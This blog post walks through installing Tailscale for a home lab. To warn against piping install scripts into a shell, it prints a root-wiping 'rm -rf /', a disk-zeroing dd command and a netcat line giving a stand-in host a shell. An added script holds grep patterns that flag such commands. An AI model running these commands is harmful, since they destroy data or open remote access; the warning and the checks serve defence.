A VPN is a powerful tool. Many of us have used it to access region-restricted content by connecting to a VPN in a different region. However, the use of a VPN goes beyond that. You can set up your own VPN to access your device over the internet without exposing your network.
Okay, that was confusing. It is easier to understand by actually creating a VPN; how it works will become clear once we start using it. We will be using Tailscale for this purpose.
Tailscale
Tailscale is a VPN service provider used by many big companies. It has free as well as paid tiers. For our home lab, the free tier is more than enough. To get started with Tailscale, follow these steps:
Set up a Tailscale account. (duhh)
You can sign up using Google or other OAuth providers, or create a new account.
After you log in, you will see a screen like this
Copy and paste the curl command into your shell. The curl part pulls the installation script and pipes it directly into a shell. Whenever you see something like that, I recommend checking the script thoroughly, because this pattern gives random scripts on the internet the power to run directly on your computer. Imagine if the script was
# this will wipe the root directory and delete your entire system
rm -rf /
or
# this will overwrite your disk with zeros: a hard wipe of everything
dd if=/dev/zero of=/dev/sda
or
# this will connect to the remote and execute whatever is run remotely
# directly in your local machine
netcat -l asdf.asdf.com -e /bin/zsh &
Okay, I got off track. I think you understand what I mean. Such one-liners can cause disasters; imagine what full-blown scripts can do. But here, since we are following instructions from a trusted provider, it is safe to run that command. Now, I forgot where I was.
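A safer alternative to piping curl straight into a shell, as an added example that is not part of the original post: save the script to a file, flag the kinds of lines shown above for a close read, and run only the bytes you reviewed. The function names and the constructed stand-in installer are assumptions for illustration.

```sh
#!/bin/sh
# Added example (not from the original post): review first, then run pinned bytes.
# sha256_of, fetch_script, scan_script and run_if_pinned are hypothetical helpers.

# SHA-256 of a file (sha256sum on Linux, shasum on macOS/BSD).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# Save the script to disk so the bytes you read are the bytes you run.
# usage: fetch_script URL OUTFILE
fetch_script() {
  curl --fail --silent --show-error --location --proto '=https' -o "$2" "$1"
}

# Print lines that deserve a close read; exit status 1 if any were found.
# A heuristic to direct attention, not a verdict on the script.
scan_script() {
  if grep -nE \
    -e '(^|[^[:alnum:]_])rm[[:space:]]+-[[:alnum:]]*[rR]' \
    -e '(^|[^[:alnum:]_])dd[[:space:]].*of=/dev/' \
    -e '(^|[^[:alnum:]_])(netcat|ncat|nc)([[:space:]].*)?[[:space:]]-[[:alnum:]]*e' \
    -e '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh' \
    "$1"; then
    return 1
  fi
  return 0
}

# Run FILE only if it still hashes to the value recorded at review time.
# usage: run_if_pinned FILE EXPECTED_SHA256
run_if_pinned() {
  actual_sha=$(sha256_of "$1")
  if [ "$actual_sha" != "$2" ]; then
    echo "refusing to run $1: hash is $actual_sha" >&2
    return 1
  fi
  sh "$1"
}

# Demo on a constructed stand-in installer, so it runs offline.
demo_dir=$(mktemp -d)
printf '%s\n' '#!/bin/sh' 'echo "installer ran"' > "$demo_dir/install.sh"
scan_script "$demo_dir/install.sh" && pinned=$(sha256_of "$demo_dir/install.sh")
run_if_pinned "$demo_dir/install.sh" "$pinned"
```

Record the hash right after you finish reading the file; a later download that hashes differently is a different script and needs a fresh review.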
So, after you run that command successfully, you need to start the Tailscale daemon. You can do that by running:
sudo tailscale login
This will ask you to log in by following a URL. Once you log in to Tailscale, you will be prompted to connect. After the connection is established, you will see something like this:
You can see that a new device is connected. Next to the device hostname, you will see an IP address. That's the private IP address of your computer. Any devices connected to your Tailscale account will be assigned a private IP. Using these private IPs, devices can communicate with each other as if they are on the same local network.
Let's connect another device to this network. We will use our smartphone to do that. There is a Tailscale app you can download. You need to log in using the same credentials and press connect. This will add your phone to the VPN.
Now your phone and your PC can communicate with each other securely and privately. This means any services we have running locally on the PC can be accessed from our phone.
This completes the prerequisites for setting up your home lab. In the next posts we will set up different home lab services and a reverse proxy, and add DNS entries so that the home services can easily be accessed via different subdomains and domains.